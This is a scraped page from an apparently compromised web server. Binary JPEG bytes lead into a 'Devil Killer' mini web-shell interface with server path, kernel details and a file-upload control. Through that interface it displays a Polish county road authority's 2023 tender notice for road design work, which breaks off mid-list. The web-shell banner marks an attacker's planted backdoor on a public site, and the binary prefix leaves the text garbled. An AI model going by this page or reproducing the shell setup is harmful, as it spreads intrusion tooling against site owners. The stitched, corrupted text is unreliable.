JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230417/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20230417/0017896301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji projektowej pn.:<br/>„Przebudowa drogi powiatowej nr 3512S (ul. Raciborska) Rogów - Syrynia” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Wodzisławski - Powiatowy Zarząd Dróg w Wodzisławiu Śląskim z siedzibą w Syryni</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276286413</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Raciborska 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Syrynia</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-361</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL227 - Rybnicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">324517607</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@pzd-wodzislaw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://pzd.bip.powiatwodzislawski.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Zarządzanie drogami powiatowymi </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji projektowej pn.:<br/>„Przebudowa drogi powiatowej nr 3512S (ul. Raciborska) Rogów - Syrynia” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3816c278-dab3-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00178963</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00524948/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Opracowanie dokumentacji projektowej pn.: Przebudowa drogi powiatowej nr 3512S (ul. Raciborska) Rogów-Syrynia</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://pzd-wodzislaw.logintrade.net/zapytania_email,125220,97bbe1d378f8b525d60ebaf73e66854f.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym, a wykonawcą, z uwzględnieniem wyjątków określonych w PZP, odbywa się przy użyciu środków komunikacji elektronicznej, z zastrzeżeniem ust. 2. Przez środki<br/>komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o<br/>świadczeniu usług drogą elektroniczną (t.j. Dz. U. z 2020 r. poz. 344).<br/>2. Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu Platformy do elektronicznej obsługi zamówień<br/>dostępnej pod adresem: https://pzd-wodzislaw.logintrade.net/rejestracja/ustawowe.html oraz poczty elektronicznej: sekretariat@pzd-wodzislaw.pl w sytuacjach awaryjnych np. w przypadku niedziałania Platformy (nie dotyczy składania ofert).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Szczegółowe instrukcje korzystania z Platformy przez wykonawców znajdują się pod adresem: https://pzd-wodzislaw.logintrade.net/rejestracja/instrukcje.html<br/>2. Oświadczenia lub dokumenty przekazywane za pośrednictwem środka komunikacji elektronicznej przesyła się w formatach<br/>danych określonych w przepisach wydanych na podstawie § 2 ust. 1 i 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia<br/>2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych<br/>oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz.<br/>2452).<br/>Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ustawy PZP, przedmiotowych środków dowodowych,<br/>podmiotowych środków dowodowych oraz innych oświadczeń i dokumentów przyjmuje się datę ich wpływu na Platformę, a nie datę<br/>wykonania danej czynności przez Wykonawcę na Platformie.<br/>3. Ofertę zgodnie z treścią załącznika nr 1 do SWZ, oświadczenie, o którym mowa w art. 125 ust. 1 PZP, składa się, pod rygorem<br/>nieważności w formie elektronicznej (opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym, przez osobę lub osoby upoważnione.<br/>4. Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 ustawy, podmiotowe środki dowodowe, w tym oświadczenie, o którym<br/>mowa w art. 117 ust. 4 ustawy, oraz zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 ustawy,<br/>zwane dalej „zobowiązaniem podmiotu udostępniającego zasoby”, przedmiotowe środki dowodowe, pełnomocnictwo, dokumenty, o<br/>których mowa w art. 94 ust. 2 ustawy, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach<br/>wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania<br/>publiczne (t.j. Dz. U. z 2021 r. poz. 670).<br/>5. Wymagania techniczne i organizacyjne sporządzania, wysyłania i odbierania korespondencji elektronicznej:<br/>1) Wymagania techniczne, jakim musi odpowiadać sprzęt komputerowy Wykonawcy, aby móc korzystać z Platformy:<br/>Dopuszczalne przeglądarki internetowe:<br/>- Edge<br/>- Google Chrome<br/>- Mozilla Firefox<br/>- Opera<br/>6. Pozostałe wymagania techniczne i organizacyjne wskazano szczegółowo w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. administratorem następujących danych osobowych zebranych od osób fizycznych:<br/>imion i nazwisk, adresu zamieszkania, nr telefonu, adresu poczty elektronicznej, danych dotyczących wyroków skazujących oraz<br/>czynów zabronionych lub powiązanych środków bezpieczeństwa, jest Powiatowy Zarząd Dróg w Wodzisławiu Śląskim z siedzibą w<br/>Syryni, ul. Raciborska 3, 44-361 Syrynia, telefon: 32/451-76-07, adres poczty elektronicznej: sekretariat@pzd-wodzislaw.pl,<br/>2. inspektorem ochrony danych osobowych w Powiatowym Zarządzie Dróg jest Pan Sławomir Maciejczyk, e-mail: iod@pzd-wodzislaw.pl<br/>3. dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w zw. z art. art. 18 ust. 6 i 19 Ustawy w związku z<br/>postępowaniem o udzielenie zamówienia publicznego o nazwie: Opracowanie dokumentacji projektowej pn.: „Przebudowa drogi<br/>powiatowej nr 3512S (ul. Raciborska) Rogów - Syrynia” nr postępowania: ZP.2521.7.2023 prowadzonym w trybie podstawowym bez<br/>przeprowadzenia negocjacji;<br/>4. odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o<br/>art. 74 PZP,<br/>5. dane osobowe będą przechowywane, zgodnie z art. 78 PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie, a jeżeli okres obowiązywania umowy przekracza 4 lata - ponadto przez cały okres obowiązywania umowy, chyba że zajdzie uzasadniona konieczność przechowywania ich dłużej dla celów dowodowych w zakresie postępowania prowadzonego przez właściwe organy. Po tym czasie dane będą usuwane;<br/>6. osoba, której dane osobowe dotyczą ma prawo żądać od Administratora dostępu do danych osobowych dotyczących tej osoby<br/>oraz ich kopii, ich sprostowania lub ograniczenia przetwarzania w każdym czasie. Jednakże:<br/>6.1. skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego<br/>ani zmianą postanowień umowy w zakresie niezgodnym z PZP<br/>oraz nie może naruszać integralności protokołu lub jego załączników;<br/>6.2. Zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych<br/>osobowych do czasu zakończenia niniejszego postępowania;<br/>6.3. mimo ograniczenia przetwarzania danych na podstawie przepisu art. 18 ust. 1 RODO, takie dane osobowe można<br/>przechowywać lub przetwarzać w celu ustalenia, dochodzenia lub obrony roszczeń, lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii lub państwa członkowskiego.<br/>7. Osobie, której dane są przetwarzane nie przysługuje prawo do żądania usunięcia danych, do przenoszenia danych ani też prawo<br/>do sprzeciwu wobec przetwarzania danych osobowych (por. art. art. 17 ust. 3 lit. lit. b), d) i e) oraz 20 RODO).<br/>8. Osobie, której dane są przetwarzane nie przysługuje prawo wniesienia sprzeciwu wobec przetwarzania danych osobowych (por.<br/>art. 20 w zw. z art. 6 ust. 1 lit. c) RODO).<br/>9. Osoba, której dane są przetwarzane ma prawo wniesienia skargi do organu nadzorczego tj. do Prezesa Urzędu Ochrony Danych<br/>Osobowych.<br/>10. Obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach PZP, związanym z udziałem w<br/>postępowaniu o udzielenie zamówienia publicznego oraz ewentualnym zawarciem umowy w sprawie zamówienia publicznego;<br/>konsekwencje niepodania określonych danych wynikają z przepisów PZP;<br/>11. Dane nie będą poddawane zautomatyzowanemu procesowi przetwarzania ani profilowaniu.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1. osoba, której dane osobowe dotyczą ma prawo żądać od Administratora dostępu do danych osobowych dotyczących tej osoby oraz ich kopii, ich sprostowania lub ograniczenia przetwarzania w każdym czasie.<br/>Jednakże:<br/>1.1. skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego<br/>ani zmianą postanowień umowy w zakresie niezgodnym z PZP<br/>oraz nie może naruszać integralności protokołu lub jego załączników;<br/>1.2. Zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych<br/>osobowych do czasu zakończenia niniejszego postępowania;<br/>1.3. mimo ograniczenia przetwarzania danych na podstawie przepisu art. 18 ust. 1 RODO, takie dane osobowe można<br/>przechowywać lub przetwarzać w celu ustalenia, dochodzenia lub obrony roszczeń, lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii lub państwa członkowskiego.<br/>2. Osobie, której dane są przetwarzane nie przysługuje prawo do żądania usunięcia danych, do przenoszenia danych ani też prawo<br/>do sprzeciwu wobec przetwarzania danych osobowych (por. art. art. 17 ust. 3 lit. lit. b), d) i e) oraz 20 RODO).<br/>3. Osobie, której dane są przetwarzane nie przysługuje prawo wniesienia sprzeciwu wobec przetwarzania danych osobowych (por.<br/>art. 20 w zw. z art. 6 ust. 1 lit. c) RODO).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.2521.7.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia obejmuje wykonanie dokumentacji projektowej wraz z nadzorem autorskim pn.: „Przebudowa drogi powiatowej nr 3512S (ul. Raciborska) Rogów - Syrynia”.<br/>Odcinek objęty dokumentacją: ok. 3,1 km drogi <br/>Zakres opracowania: Odcinek drogi od skrzyżowania z ul. Bukowską (DW936) w Syryni do skrzyżowania z ul. Sportową w Rogowie – zakres nie obejmuje przebudowy w/w skrzyżowań. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">22 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1) cena (znaczenie – 60%) – X1<br/>w tym:<br/>a) cena za wykonanie dokumentacji projektowej – 58%<br/>b) koszt (cena) nadzoru autorskiego za jeden pobyt wraz z kosztami przejazdu i delegacji (w siedzibie Zamawiającego lub na placu<br/>budowy) - 2%<br/>2) doświadczenie projektanta w branży drogowej wyznaczonego do realizacji zamówienia w zakresie wymaganym przez Zamawiającego w niniejszym postępowaniu (znaczenie 40%) – X2</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta w branży drogowej wyznaczonego do realizacji zamówienia w zakresie wymaganym przez Zamawiającego w niniejszym postępowaniu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy PZP, Zamawiający określa poniżej warunki udziału w postępowaniu dotyczące:<br/>1. zdolności do występowania w obrocie gospodarczym – Zamawiający nie stawia warunku w powyższym zakresie;<br/>2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – Zamawiający nie stawia warunku w powyższym zakresie;<br/>3. sytuacji ekonomicznej lub finansowej – Zamawiający nie stawia warunku w powyższym zakresie;<br/>4. zdolności technicznej lub zawodowej:<br/>4.1. Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał dokumentację projektową w zakresie budowy/przebudowy drogi publicznej o długości minimum 2,0 km. <br/>4.2. Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż dysponuje osobami posiadającymi odpowiednie kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonania zamówienia wraz z zakresem wykonywanych przez nie czynności, które są skierowane przez Wykonawcę do realizacji niniejszego zamówienia, tj.: osobami posiadającymi uprawnienia projektowe, niezbędne do wykonania zamówienia dla występującej w zadaniu branży: <br/>	drogowej (projektant) <br/>(lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, bądź odpowiednie kwalifikacje zawodowe uznane na zasadach określonych w przepisach odrębnych)<br/>zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t. j. Dz. U. z 2021 r., poz. 2351 ze zm.) i Rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2019 r., poz. 831). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (tj. Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej, zgodnie ze wzorem stanowiącym załącznik nr 7 do SWZ; <br/>2.	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji; <br/>2.1. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast dokumentu jak wyżej, składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. <br/>2.2. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej lub gdy dokumenty te nie odnoszą się do wszystkich przypadków, o których mowa w art. 108 ust. 1 pkt 1, 2 i 4, art. 109 ust. 1 pkt 1, 2 lit. a i b oraz pkt 3 PZP, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy. <br/>2.3. Dokumenty/oświadczenia, o których mowa w pkt pkt 2.1 i 2.2. powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 